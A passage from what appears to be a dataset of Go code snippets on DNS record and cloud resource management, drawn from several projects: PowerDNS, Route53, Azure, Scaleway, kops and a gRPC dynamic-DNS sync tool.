fwtransport.SendFrameworkRequest(&p.FrameworkProvider.FrameworkProviderConfig, \"GET\", billingProject, url, p.UserAgent, nil)\n\t\t\tif !diags.HasError() {\n\t\t\t\treturn fmt.Errorf(\"DNSResourceDnsRecordSet still exists at %s\", url)\n\t\t\t}\n\t\t}\n\n\t\treturn nil\n\t}\n}", "func findRecordsToAdd(configrr *route53Zone, awsrr []*route53.ResourceRecordSet) []*route53.Change {\n\n\tvar diff []*route53.Change\n\tlen1 := len(configrr.ResourceRecordSets)\n\tlen2 := len(awsrr)\n\n\tfor i := 1; i < len1; i++ {\n\t\tvar j int\n\t\tfor j = 0; j < len2; j++ {\n\t\t\t// Find a match, short circuit and go to the next iteration\n\t\t\tif configrr.ResourceRecordSets[i].Name == aws.StringValue(awsrr[j].Name) &&\n\t\t\t\tconfigrr.ResourceRecordSets[i].Type == aws.StringValue(awsrr[j].Type) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif j == len2 {\n\t\t\tchange, err := getChange(\"CREATE\", &configrr.ResourceRecordSets[i])\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"Error getting change will adding recordset %s with error: %s \",\n\t\t\t\t\tconfigrr.ResourceRecordSets[i].Name, err)\n\t\t\t}\n\t\t\tdiff = append(diff, change)\n\t\t}\n\t}\n\n\treturn diff\n}", "func (p *PDNSProvider) mutateRecords(endpoints []*endpoint.Endpoint, changetype pdnsChangeType) error {\n\tzonelist, err := p.ConvertEndpointsToZones(endpoints, changetype)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfor _, zone := range zonelist {\n\t\tjso, err := json.Marshal(zone)\n\t\tif err != nil {\n\t\t\tlog.Errorf(\"JSON Marshal for zone struct failed!\")\n\t\t} else {\n\t\t\tlog.Debugf(\"Struct for PatchZone:\\n%s\", string(jso))\n\t\t}\n\t\tresp, err := p.client.PatchZone(zone.Id, zone)\n\t\tif err != nil {\n\t\t\tlog.Debugf(\"PDNS API response: %s\", stringifyHTTPResponseBody(resp))\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func (p *MockPeer) SetRwSets(rwSets ...*rwsetutil.NsRwSet) {\r\n\tp.RwSets = rwSets\r\n}", "func main() {\n\n\t// Create new provider instance\n\tprovider := azure.Provider{\n\t\tTenantId: os.Getenv(\"AZURE_TENANT_ID\"),\n\t\tClientId: os.Getenv(\"AZURE_CLIENT_ID\"),\n\t\tClientSecret: os.Getenv(\"AZURE_CLIENT_SECRET\"),\n\t\tSubscriptionId: os.Getenv(\"AZURE_SUBSCRIPTION_ID\"),\n\t\tResourceGroupName: os.Getenv(\"AZURE_RESOURCE_GROUP_NAME\"),\n\t}\n\tzone := os.Getenv(\"AZURE_DNS_ZONE_FQDN\")\n\n\t// List existing records\n\tfmt.Printf(\"(1) List existing records\\n\")\n\tcurrentRecords, err := provider.GetRecords(context.TODO(), zone)\n\tif err != nil {\n\t\tfmt.Printf(\"%v\\n\", err)\n\t\treturn\n\t}\n\tfor _, record := range currentRecords {\n\t\tfmt.Printf(\"Exists: %v\\n\", record)\n\t}\n\n\t// Define test records\n\ttestRecords := []libdns.Record{\n\t\tlibdns.Record{\n\t\t\tType: \"A\",\n\t\t\tName: \"record-a\",\n\t\t\tValue: \"127.0.0.1\",\n\t\t\tTTL: time.Duration(30) * time.Second,\n\t\t},\n\t\tlibdns.Record{\n\t\t\tType: \"AAAA\",\n\t\t\tName: \"record-aaaa\",\n\t\t\tValue: \"::1\",\n\t\t\tTTL: time.Duration(31) * time.Second,\n\t\t},\n\t\tlibdns.Record{\n\t\t\tType: \"CAA\",\n\t\t\tName: \"record-caa\",\n\t\t\tValue: \"0 issue 'ca.\" + zone + \"'\",\n\t\t\tTTL: time.Duration(32) * time.Second,\n\t\t},\n\t\tlibdns.Record{\n\t\t\tType: \"CNAME\",\n\t\t\tName: \"record-cname\",\n\t\t\tValue: \"www.\" + zone,\n\t\t\tTTL: time.Duration(33) * time.Second,\n\t\t},\n\t\tlibdns.Record{\n\t\t\tType: \"MX\",\n\t\t\tName: \"record-mx\",\n\t\t\tValue: \"10 mail.\" + zone,\n\t\t\tTTL: time.Duration(34) * time.Second,\n\t\t},\n\t\t// libdns.Record{\n\t\t// \tType: \"NS\",\n\t\t// \tName: \"@\",\n\t\t// \tValue: \"ns1.example.com.\",\n\t\t// \tTTL: time.Duration(35) * time.Second,\n\t\t// },\n\t\tlibdns.Record{\n\t\t\tType: \"PTR\",\n\t\t\tName: \"record-ptr\",\n\t\t\tValue: \"hoge.\" + zone,\n\t\t\tTTL: time.Duration(36) * time.Second,\n\t\t},\n\t\t// libdns.Record{\n\t\t// \tType: \"SOA\",\n\t\t// \tName: \"@\",\n\t\t// \tValue: \"ns1.example.com. hostmaster.\" + zone + \" 1 7200 900 1209600 86400\",\n\t\t// \tTTL: time.Duration(37) * time.Second,\n\t\t// },\n\t\tlibdns.Record{\n\t\t\tType: \"SRV\",\n\t\t\tName: \"record-srv\",\n\t\t\tValue: \"1 10 5269 app.\" + zone,\n\t\t\tTTL: time.Duration(38) * time.Second,\n\t\t},\n\t\tlibdns.Record{\n\t\t\tType: \"TXT\",\n\t\t\tName: \"record-txt\",\n\t\t\tValue: \"TEST VALUE\",\n\t\t\tTTL: time.Duration(39) * time.Second,\n\t\t}}\n\n\t// Create new records\n\tfmt.Printf(\"(2) Create new records\\n\")\n\tcreatedRecords, err := provider.AppendRecords(context.TODO(), zone, testRecords)\n\tif err != nil {\n\t\tfmt.Printf(\"%v\\n\", err)\n\t\treturn\n\t}\n\tfor _, record := range createdRecords {\n\t\tfmt.Printf(\"Created: %v\\n\", record)\n\t}\n\n\t// Update new records\n\tfmt.Printf(\"(3) Update newly added records\\n\")\n\tupdatedRecords, err := provider.SetRecords(context.TODO(), zone, testRecords)\n\tif err != nil {\n\t\tfmt.Printf(\"%v\\n\", err)\n\t\treturn\n\t}\n\tfor _, record := range updatedRecords {\n\t\tfmt.Printf(\"Updated: %v\\n\", record)\n\t}\n\n\t// Delete new records\n\tfmt.Printf(\"(4) Delete newly added records\\n\")\n\tdeletedRecords, err := provider.DeleteRecords(context.TODO(), zone, testRecords)\n\tif err != nil {\n\t\tfmt.Printf(\"%v\\n\", err)\n\t\treturn\n\t}\n\tfor _, record := range deletedRecords {\n\t\tfmt.Printf(\"Deleted: %v\\n\", record)\n\t}\n\n}", "func ExampleVirtualMachineScaleSetsClient_BeginCreateOrUpdate_createAScaleSetWithVirtualMachinesInDifferentZones() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armcompute.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\tpoller, err := clientFactory.NewVirtualMachineScaleSetsClient().BeginCreateOrUpdate(ctx, \"myResourceGroup\", \"{vmss-name}\", armcompute.VirtualMachineScaleSet{\n\t\tLocation: to.Ptr(\"centralus\"),\n\t\tProperties: &armcompute.VirtualMachineScaleSetProperties{\n\t\t\tOverprovision: to.Ptr(true),\n\t\t\tUpgradePolicy: &armcompute.UpgradePolicy{\n\t\t\t\tMode: to.Ptr(armcompute.UpgradeModeAutomatic),\n\t\t\t},\n\t\t\tVirtualMachineProfile: &armcompute.VirtualMachineScaleSetVMProfile{\n\t\t\t\tNetworkProfile: &armcompute.VirtualMachineScaleSetNetworkProfile{\n\t\t\t\t\tNetworkInterfaceConfigurations: []*armcompute.VirtualMachineScaleSetNetworkConfiguration{\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tName: to.Ptr(\"{vmss-name}\"),\n\t\t\t\t\t\t\tProperties: &armcompute.VirtualMachineScaleSetNetworkConfigurationProperties{\n\t\t\t\t\t\t\t\tEnableIPForwarding: to.Ptr(true),\n\t\t\t\t\t\t\t\tIPConfigurations: []*armcompute.VirtualMachineScaleSetIPConfiguration{\n\t\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\t\tName: to.Ptr(\"{vmss-name}\"),\n\t\t\t\t\t\t\t\t\t\tProperties: &armcompute.VirtualMachineScaleSetIPConfigurationProperties{\n\t\t\t\t\t\t\t\t\t\t\tSubnet: &armcompute.APIEntityReference{\n\t\t\t\t\t\t\t\t\t\t\t\tID: to.Ptr(\"/subscriptions/{subscription-id}/resourceGroups/myResourceGroup/providers/Microsoft.Network/virtualNetworks/{existing-virtual-network-name}/subnets/{existing-subnet-name}\"),\n\t\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t}},\n\t\t\t\t\t\t\t\tPrimary: to.Ptr(true),\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t}},\n\t\t\t\t},\n\t\t\t\tOSProfile: &armcompute.VirtualMachineScaleSetOSProfile{\n\t\t\t\t\tAdminPassword: to.Ptr(\"{your-password}\"),\n\t\t\t\t\tAdminUsername: to.Ptr(\"{your-username}\"),\n\t\t\t\t\tComputerNamePrefix: to.Ptr(\"{vmss-name}\"),\n\t\t\t\t},\n\t\t\t\tStorageProfile: &armcompute.VirtualMachineScaleSetStorageProfile{\n\t\t\t\t\tDataDisks: []*armcompute.VirtualMachineScaleSetDataDisk{\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tCreateOption: to.Ptr(armcompute.DiskCreateOptionTypesEmpty),\n\t\t\t\t\t\t\tDiskSizeGB: to.Ptr[int32](1023),\n\t\t\t\t\t\t\tLun: to.Ptr[int32](0),\n\t\t\t\t\t\t},\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tCreateOption: to.Ptr(armcompute.DiskCreateOptionTypesEmpty),\n\t\t\t\t\t\t\tDiskSizeGB: to.Ptr[int32](1023),\n\t\t\t\t\t\t\tLun: to.Ptr[int32](1),\n\t\t\t\t\t\t}},\n\t\t\t\t\tImageReference: &armcompute.ImageReference{\n\t\t\t\t\t\tOffer: to.Ptr(\"WindowsServer\"),\n\t\t\t\t\t\tPublisher: to.Ptr(\"MicrosoftWindowsServer\"),\n\t\t\t\t\t\tSKU: to.Ptr(\"2016-Datacenter\"),\n\t\t\t\t\t\tVersion: to.Ptr(\"latest\"),\n\t\t\t\t\t},\n\t\t\t\t\tOSDisk: &armcompute.VirtualMachineScaleSetOSDisk{\n\t\t\t\t\t\tCaching: to.Ptr(armcompute.CachingTypesReadWrite),\n\t\t\t\t\t\tCreateOption: to.Ptr(armcompute.DiskCreateOptionTypesFromImage),\n\t\t\t\t\t\tDiskSizeGB: to.Ptr[int32](512),\n\t\t\t\t\t\tManagedDisk: &armcompute.VirtualMachineScaleSetManagedDiskParameters{\n\t\t\t\t\t\t\tStorageAccountType: to.Ptr(armcompute.StorageAccountTypesStandardLRS),\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t\tSKU: &armcompute.SKU{\n\t\t\tName: to.Ptr(\"Standard_A1_v2\"),\n\t\t\tCapacity: to.Ptr[int64](2),\n\t\t\tTier: to.Ptr(\"Standard\"),\n\t\t},\n\t\tZones: []*string{\n\t\t\tto.Ptr(\"1\"),\n\t\t\tto.Ptr(\"3\")},\n\t}, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n\tres, err := poller.PollUntilDone(ctx, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to pull the result: %v\", err)\n\t}\n\t// You could use response here. We use blank identifier for just demo purposes.\n\t_ = res\n\t// If the HTTP response code is 200 as defined in example definition, your response structure would look as follows. Please pay attention that all the values in the output are fake values for just demo purposes.\n\t// res.VirtualMachineScaleSet = armcompute.VirtualMachineScaleSet{\n\t// \tName: to.Ptr(\"{vmss-name}\"),\n\t// \tType: to.Ptr(\"Microsoft.Compute/virtualMachineScaleSets\"),\n\t// \tID: to.Ptr(\"/subscriptions/{subscription-id}/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachineScaleSets/{vmss-name}\"),\n\t// \tLocation: to.Ptr(\"centralus\"),\n\t// \tProperties: &armcompute.VirtualMachineScaleSetProperties{\n\t// \t\tOverprovision: to.Ptr(true),\n\t// \t\tProvisioningState: to.Ptr(\"Succeeded\"),\n\t// \t\tSinglePlacementGroup: to.Ptr(false),\n\t// \t\tUniqueID: to.Ptr(\"8042c376-4690-4c47-9fa2-fbdad70e32fa\"),\n\t// \t\tUpgradePolicy: &armcompute.UpgradePolicy{\n\t// \t\t\tMode: to.Ptr(armcompute.UpgradeModeAutomatic),\n\t// \t\t},\n\t// \t\tVirtualMachineProfile: &armcompute.VirtualMachineScaleSetVMProfile{\n\t// \t\t\tNetworkProfile: &armcompute.VirtualMachineScaleSetNetworkProfile{\n\t// \t\t\t\tNetworkInterfaceConfigurations: []*armcompute.VirtualMachineScaleSetNetworkConfiguration{\n\t// \t\t\t\t\t{\n\t// \t\t\t\t\t\tName: to.Ptr(\"{vmss-name}\"),\n\t// \t\t\t\t\t\tProperties: &armcompute.VirtualMachineScaleSetNetworkConfigurationProperties{\n\t// \t\t\t\t\t\t\tDNSSettings: &armcompute.VirtualMachineScaleSetNetworkConfigurationDNSSettings{\n\t// \t\t\t\t\t\t\t\tDNSServers: []*string{\n\t// \t\t\t\t\t\t\t\t},\n\t// \t\t\t\t\t\t\t},\n\t// \t\t\t\t\t\t\tEnableAcceleratedNetworking: to.Ptr(false),\n\t// \t\t\t\t\t\t\tEnableIPForwarding: to.Ptr(true),\n\t// \t\t\t\t\t\t\tIPConfigurations: []*armcompute.VirtualMachineScaleSetIPConfiguration{\n\t// \t\t\t\t\t\t\t\t{\n\t// \t\t\t\t\t\t\t\t\tName: to.Ptr(\"{vmss-name}\"),\n\t// \t\t\t\t\t\t\t\t\tProperties: &armcompute.VirtualMachineScaleSetIPConfigurationProperties{\n\t// \t\t\t\t\t\t\t\t\t\tPrivateIPAddressVersion: to.Ptr(armcompute.IPVersionIPv4),\n\t// \t\t\t\t\t\t\t\t\t\tSubnet: &armcompute.APIEntityReference{\n\t// \t\t\t\t\t\t\t\t\t\t\tID: to.Ptr(\"/subscriptions/{subscription-id}/resourceGroups/myResourceGroup/providers/Microsoft.Network/virtualNetworks/nsgExistingVnet/subnets/nsgExistingSubnet\"),\n\t// \t\t\t\t\t\t\t\t\t\t},\n\t// \t\t\t\t\t\t\t\t\t},\n\t// \t\t\t\t\t\t\t}},\n\t// \t\t\t\t\t\t\tPrimary: to.Ptr(true),\n\t// \t\t\t\t\t\t},\n\t// \t\t\t\t}},\n\t// \t\t\t},\n\t// \t\t\tOSProfile: &armcompute.VirtualMachineScaleSetOSProfile{\n\t// \t\t\t\tAdminUsername: to.Ptr(\"{your-username}\"),\n\t// \t\t\t\tComputerNamePrefix: to.Ptr(\"{vmss-name}\"),\n\t// \t\t\t\tSecrets: []*armcompute.VaultSecretGroup{\n\t// \t\t\t\t},\n\t// \t\t\t\tWindowsConfiguration: &armcompute.WindowsConfiguration{\n\t// \t\t\t\t\tEnableAutomaticUpdates: to.Ptr(true),\n\t// \t\t\t\t\tProvisionVMAgent: to.Ptr(true),\n\t// \t\t\t\t},\n\t// \t\t\t},\n\t// \t\t\tStorageProfile: &armcompute.VirtualMachineScaleSetStorageProfile{\n\t// \t\t\t\tDataDisks: []*armcompute.VirtualMachineScaleSetDataDisk{\n\t// \t\t\t\t\t{\n\t// \t\t\t\t\t\tCaching: to.Ptr(armcompute.CachingTypesNone),\n\t// \t\t\t\t\t\tCreateOption: to.Ptr(armcompute.DiskCreateOptionTypesEmpty),\n\t// \t\t\t\t\t\tDiskSizeGB: to.Ptr[int32](1023),\n\t// \t\t\t\t\t\tLun: to.Ptr[int32](0),\n\t// \t\t\t\t\t\tManagedDisk: &armcompute.VirtualMachineScaleSetManagedDiskParameters{\n\t// \t\t\t\t\t\t\tStorageAccountType: to.Ptr(armcompute.StorageAccountTypesStandardLRS),\n\t// \t\t\t\t\t\t},\n\t// \t\t\t\t\t},\n\t// \t\t\t\t\t{\n\t// \t\t\t\t\t\tCaching: to.Ptr(armcompute.CachingTypesNone),\n\t// \t\t\t\t\t\tCreateOption: to.Ptr(armcompute.DiskCreateOptionTypesEmpty),\n\t// \t\t\t\t\t\tDiskSizeGB: to.Ptr[int32](1023),\n\t// \t\t\t\t\t\tLun: to.Ptr[int32](1),\n\t// \t\t\t\t\t\tManagedDisk: &armcompute.VirtualMachineScaleSetManagedDiskParameters{\n\t// \t\t\t\t\t\t\tStorageAccountType: to.Ptr(armcompute.StorageAccountTypesStandardLRS),\n\t// \t\t\t\t\t\t},\n\t// \t\t\t\t}},\n\t// \t\t\t\tImageReference: &armcompute.ImageReference{\n\t// \t\t\t\t\tOffer: to.Ptr(\"WindowsServer\"),\n\t// \t\t\t\t\tPublisher: to.Ptr(\"MicrosoftWindowsServer\"),\n\t// \t\t\t\t\tSKU: to.Ptr(\"2016-Datacenter\"),\n\t// \t\t\t\t\tVersion: to.Ptr(\"latest\"),\n\t// \t\t\t\t},\n\t// \t\t\t\tOSDisk: &armcompute.VirtualMachineScaleSetOSDisk{\n\t// \t\t\t\t\tCaching: to.Ptr(armcompute.CachingTypesReadWrite),\n\t// \t\t\t\t\tCreateOption: to.Ptr(armcompute.DiskCreateOptionTypesFromImage),\n\t// \t\t\t\t\tDiskSizeGB: to.Ptr[int32](512),\n\t// \t\t\t\t\tManagedDisk: &armcompute.VirtualMachineScaleSetManagedDiskParameters{\n\t// \t\t\t\t\t\tStorageAccountType: to.Ptr(armcompute.StorageAccountTypesStandardLRS),\n\t// \t\t\t\t\t},\n\t// \t\t\t\t},\n\t// \t\t\t},\n\t// \t\t},\n\t// \t\tZoneBalance: to.Ptr(false),\n\t// \t},\n\t// \tSKU: &armcompute.SKU{\n\t// \t\tName: to.Ptr(\"Standard_A1_v2\"),\n\t// \t\tCapacity: to.Ptr[int64](2),\n\t// \t\tTier: to.Ptr(\"Standard\"),\n\t// \t},\n\t// \tZones: []*string{\n\t// \t\tto.Ptr(\"1\"),\n\t// \t\tto.Ptr(\"3\")},\n\t// \t}\n}", "func (p *PDNSProvider) Records(ctx context.Context) (endpoints []*endpoint.Endpoint, _ error) {\n\tzones, _, err := p.client.ListZones()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfilteredZones, _ := p.client.PartitionZones(zones)\n\n\tfor _, zone := range filteredZones {\n\t\tz, _, err := p.client.ListZone(zone.Id)\n\t\tif err != nil {\n\t\t\tlog.Warnf(\"Unable to fetch Records\")\n\t\t\treturn nil, err\n\t\t}\n\n\t\tfor _, rr := range z.Rrsets {\n\t\t\te, err := p.convertRRSetToEndpoints(rr)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tendpoints = append(endpoints, e...)\n\t\t}\n\t}\n\n\tlog.Debugf(\"Records fetched:\\n%+v\", endpoints)\n\treturn endpoints, nil\n}", "func (o *dnsOp) listRecords(zone dnsprovider.Zone) ([]dnsprovider.ResourceRecordSet, error) {\n\tkey := zone.Name() + \"::\" + zone.ID()\n\n\trrs := o.recordsCache[key]\n\tif rrs == nil {\n\t\trrsProvider, ok := zone.ResourceRecordSets()\n\t\tif !ok {\n\t\t\treturn nil, fmt.Errorf(\"zone does not support resource records %q\", zone.Name())\n\t\t}\n\n\t\tklog.V(2).Infof(\"Querying all dnsprovider records for zone %q\", zone.Name())\n\t\tvar err error\n\t\trrs, err = rrsProvider.List()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"error querying resource records for zone %q: %v\", zone.Name(), err)\n\t\t}\n\n\t\to.recordsCache[key] = rrs\n\t}\n\n\treturn rrs, nil\n}", "func (s *API) UpdateDNSZoneRecords(req *UpdateDNSZoneRecordsRequest, opts ...scw.RequestOption) (*UpdateDNSZoneRecordsResponse, error) {\n\tvar err error\n\n\tif fmt.Sprint(req.DNSZone) == \"\" {\n\t\treturn nil, errors.New(\"field DNSZone cannot be empty in request\")\n\t}\n\n\tscwReq := &scw.ScalewayRequest{\n\t\tMethod: \"PATCH\",\n\t\tPath: \"/domain/v2alpha2/dns-zones/\" + fmt.Sprint(req.DNSZone) + \"/records\",\n\t\tHeaders: http.Header{},\n\t}\n\n\terr = scwReq.SetBody(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar resp UpdateDNSZoneRecordsResponse\n\n\terr = s.client.Do(scwReq, &resp, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resp, nil\n}", "func (zonesSRV *PrivateDnsZones_SRV_Spec) PopulateFromARM(owner genruntime.ArbitraryOwnerReference, armInput interface{}) error {\n\ttypedInput, ok := armInput.(PrivateDnsZones_SRV_Spec_ARM)\n\tif !ok {\n\t\treturn fmt.Errorf(\"unexpected type supplied for PopulateFromARM() function. Expected PrivateDnsZones_SRV_Spec_ARM, got %T\", armInput)\n\t}\n\n\t// Set property \"ARecords\":\n\t// copying flattened property:\n\tif typedInput.Properties != nil {\n\t\tfor _, item := range typedInput.Properties.ARecords {\n\t\t\tvar item1 ARecord\n\t\t\terr := item1.PopulateFromARM(owner, item)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tzonesSRV.ARecords = append(zonesSRV.ARecords, item1)\n\t\t}\n\t}\n\n\t// Set property \"AaaaRecords\":\n\t// copying flattened property:\n\tif typedInput.Properties != nil {\n\t\tfor _, item := range typedInput.Properties.AaaaRecords {\n\t\t\tvar item1 AaaaRecord\n\t\t\terr := item1.PopulateFromARM(owner, item)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tzonesSRV.AaaaRecords = append(zonesSRV.AaaaRecords, item1)\n\t\t}\n\t}\n\n\t// Set property \"AzureName\":\n\tzonesSRV.SetAzureName(genruntime.ExtractKubernetesResourceNameFromARMName(typedInput.Name))\n\n\t// Set property \"CnameRecord\":\n\t// copying flattened property:\n\tif typedInput.Properties != nil {\n\t\tif typedInput.Properties.CnameRecord != nil {\n\t\t\tvar cnameRecord1 CnameRecord\n\t\t\terr := cnameRecord1.PopulateFromARM(owner, *typedInput.Properties.CnameRecord)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tcnameRecord := cnameRecord1\n\t\t\tzonesSRV.CnameRecord = &cnameRecord\n\t\t}\n\t}\n\n\t// Set property \"Etag\":\n\tif typedInput.Etag != nil {\n\t\tetag := *typedInput.Etag\n\t\tzonesSRV.Etag = &etag\n\t}\n\n\t// Set property \"Metadata\":\n\t// copying flattened property:\n\tif typedInput.Properties != nil {\n\t\tif typedInput.Properties.Metadata != nil {\n\t\t\tzonesSRV.Metadata = make(map[string]string, len(typedInput.Properties.Metadata))\n\t\t\tfor key, value := range typedInput.Properties.Metadata {\n\t\t\t\tzonesSRV.Metadata[key] = value\n\t\t\t}\n\t\t}\n\t}\n\n\t// Set property \"MxRecords\":\n\t// copying flattened property:\n\tif typedInput.Properties != nil {\n\t\tfor _, item := range typedInput.Properties.MxRecords {\n\t\t\tvar item1 MxRecord\n\t\t\terr := item1.PopulateFromARM(owner, item)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tzonesSRV.MxRecords = append(zonesSRV.MxRecords, item1)\n\t\t}\n\t}\n\n\t// Set property \"Owner\":\n\tzonesSRV.Owner = &genruntime.KnownResourceReference{Name: owner.Name}\n\n\t// Set property \"PtrRecords\":\n\t// copying flattened property:\n\tif typedInput.Properties != nil {\n\t\tfor _, item := range typedInput.Properties.PtrRecords {\n\t\t\tvar item1 PtrRecord\n\t\t\terr := item1.PopulateFromARM(owner, item)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tzonesSRV.PtrRecords = append(zonesSRV.PtrRecords, item1)\n\t\t}\n\t}\n\n\t// Set property \"SoaRecord\":\n\t// copying flattened property:\n\tif typedInput.Properties != nil {\n\t\tif typedInput.Properties.SoaRecord != nil {\n\t\t\tvar soaRecord1 SoaRecord\n\t\t\terr := soaRecord1.PopulateFromARM(owner, *typedInput.Properties.SoaRecord)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tsoaRecord := soaRecord1\n\t\t\tzonesSRV.SoaRecord = &soaRecord\n\t\t}\n\t}\n\n\t// Set property \"SrvRecords\":\n\t// copying flattened property:\n\tif typedInput.Properties != nil {\n\t\tfor _, item := range typedInput.Properties.SrvRecords {\n\t\t\tvar item1 SrvRecord\n\t\t\terr := item1.PopulateFromARM(owner, item)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tzonesSRV.SrvRecords = append(zonesSRV.SrvRecords, item1)\n\t\t}\n\t}\n\n\t// Set property \"Ttl\":\n\t// copying flattened property:\n\tif typedInput.Properties != nil {\n\t\tif typedInput.Properties.Ttl != nil {\n\t\t\tttl := *typedInput.Properties.Ttl\n\t\t\tzonesSRV.Ttl = &ttl\n\t\t}\n\t}\n\n\t// Set property \"TxtRecords\":\n\t// copying flattened property:\n\tif typedInput.Properties != nil {\n\t\tfor _, item := range typedInput.Properties.TxtRecords {\n\t\t\tvar item1 TxtRecord\n\t\t\terr := item1.PopulateFromARM(owner, item)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tzonesSRV.TxtRecords = append(zonesSRV.TxtRecords, item1)\n\t\t}\n\t}\n\n\t// No error\n\treturn nil\n}", "func (e *Enforcer) UpdateRecords() (int, int, error) {\n\t// Client Auth\n\tcertificate, err := tls.LoadX509KeyPair(e.Vars.Certificate, e.Vars.Key)\n\tif err != nil {\n\t\treturn 0, 0, err\n\t}\n\n\thost, _, err := net.SplitHostPort(e.Vars.Endpoint)\n\tif err != nil {\n\t\treturn 0, 0, err\n\t}\n\n\tcreds := credentials.NewTLS(&tls.Config{\n\t\tServerName: host,\n\t\tCertificates: []tls.Certificate{certificate},\n\t})\n\n\t// gRPC connection\n\tconn, err := grpc.Dial(e.Vars.Endpoint, grpc.WithTransportCredentials(creds))\n\tif err != nil {\n\t\treturn 0, 0, err\n\t}\n\tdefer conn.Close()\n\n\tctx := context.Background()\n\n\t// Get Zone\n\tc := dns.NewDynamicDnsServiceClient(conn)\n\n\t// Get and convert all remote records to local style records\n\tonlineRecords := make([]*Record, 0)\n\tvar mutex = &sync.Mutex{}\n\tvar wg sync.WaitGroup\n\tfor _, zone := range e.Vars.Zones {\n\t\twg.Add(1)\n\t\tgo func(zone string) {\n\t\t\tres, err := c.GetZone(ctx, &dns.GetZoneRequest{\n\t\t\t\tZone: zone,\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tlog.Error(err)\n\t\t\t}\n\n\t\t\tif res.Record != nil {\n\t\t\t\tfor _, record := range res.Record {\n\t\t\t\t\tif !e.ignoredType(record.Type) {\n\t\t\t\t\t\tmutex.Lock()\n\t\t\t\t\t\tonlineRecords = append(onlineRecords, &Record{\n\t\t\t\t\t\t\tName: record.Domain,\n\t\t\t\t\t\t\tTTL: int(record.Ttl),\n\t\t\t\t\t\t\tType: record.Type,\n\t\t\t\t\t\t\tData: []string{record.Data},\n\t\t\t\t\t\t})\n\t\t\t\t\t\tmutex.Unlock()\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\twg.Done()\n\t\t}(zone)\n\t}\n\n\twg.Wait()\n\n\t// Get locally constructed records\n\tlocalRecords, err := e.GetAllRecords()\n\tif err != nil {\n\t\treturn 0, 0, err\n\t}\n\n\t// Find which records to remove\n\tremove := make([]*dns.Record, 0)\n\tfor _, r := range onlineRecords {\n\t\tif !contains(localRecords, r) {\n\t\t\t// Delete\n\t\t\tfor _, d := range r.Data {\n\t\t\t\tremove = append(remove, &dns.Record{\n\t\t\t\t\tDomain: r.Name,\n\t\t\t\t\tType: r.Type,\n\t\t\t\t\tData: d,\n\t\t\t\t})\n\t\t\t}\n\t\t}\n\t}\n\n\t// Remove records that are present on server but no locally\n\tremoved := 0\n\tif !e.Vars.DryRun {\n\t\tlog.Infof(\"Deleting %d records\", len(remove))\n\t\tfor _, r := range remove {\n\t\t\tif _, err := c.Remove(ctx, &dns.RemoveRequest{Record: []*dns.Record{r}}); err != nil {\n\t\t\t\tlog.Errorf(\"Remove of %s failed with %v\", r.Domain, err)\n\t\t\t} else {\n\t\t\t\tlog.Infof(\"Removed %s\", r.Domain)\n\t\t\t\tremoved += 1\n\t\t\t}\n\t\t}\n\t} else {\n\t\tfor _, r := range remove {\n\t\t\tfmt.Printf(\"-%s:%s:%d:%s\\n\", r.Domain, r.Type, r.Ttl, r.Data)\n\t\t}\n\t}\n\n\t// Find which records to insert\n\tinsert := make([]*dns.Record, 0)\n\tfor _, r := range localRecords {\n\t\tif !contains(onlineRecords, r) {\n\t\t\t// Add\n\t\t\tfor _, d := range r.Data {\n\t\t\t\tinsert = append(insert, &dns.Record{\n\t\t\t\t\tDomain: r.Name,\n\t\t\t\t\tTtl: uint32(r.TTL),\n\t\t\t\t\tClass: \"IN\",\n\t\t\t\t\tType: r.Type,\n\t\t\t\t\tData: d,\n\t\t\t\t})\n\t\t\t}\n\t\t}\n\t}\n\n\t// Insert records that are missing on the server\n\tadded := 0\n\tif !e.Vars.DryRun {\n\t\tlog.Infof(\"Inserting %d records\", len(insert))\n\t\tfor _, r := range insert {\n\t\t\tif _, err := c.Insert(ctx, &dns.InsertRequest{Record: []*dns.Record{r}}); err != nil {\n\t\t\t\tlog.Errorf(\"Insert of %s failed with %v\", r.Domain, err)\n\t\t\t} else {\n\t\t\t\tadded += 1\n\t\t\t\tlog.Infof(\"Added %s\", 